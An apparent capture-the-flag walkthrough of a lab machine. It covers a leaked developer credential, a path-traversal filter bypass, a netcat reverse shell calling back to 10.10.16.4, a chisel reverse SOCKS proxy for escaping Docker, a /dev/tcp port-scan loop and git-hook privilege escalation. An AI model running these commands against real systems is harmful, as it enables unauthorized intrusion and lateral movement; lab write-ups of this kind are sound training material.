
NETWORK

ENUMERATION



Git exploration





We have find some credentials
dev01:Soulless_Developer#2022
Code review

The post function uses the function recursive_replace()
This function replaces “../” with “”

Replacing the run.py
We can upload file via /upcloud


unfortunately, uploading this file on the server doesn’t execute



The replacement works and we get a shell access on the server as root

Let’s stabilised the shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.4 1235 >/tmp/f

Escape docker


Upload chisel
https://github.com/jpillora/chisel/releases/tag/v1.7.7
https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_386.gz



Let’s update chisel and use a reverse socks proxy.
Local: ./chisel server --reverse --port 9001
Target: ./chisel client 10.10.16.4:9001 R:socks

Network mapping
Now using our proxychains

we can list the other machines in the network 172.17.0.0
for i in {1..65535}; do (echo > /dev/tcp/172.17.0.1/$i) >/dev/null 2>&1 && echo $i is open; done 2>/dev/null
echo > /dev/tcp/172.17.0.1/80 >/dev/null 2>&1
Port 3000


Using the credentials found earlier we can login into dev01 account




SSH as dev01

Exploiting git hooks
Let’s get pspy on the server

Looking into the results of ./pspy we can see that a git sync is happening on cron

Looking into gtfbin we can see a way to exploit this



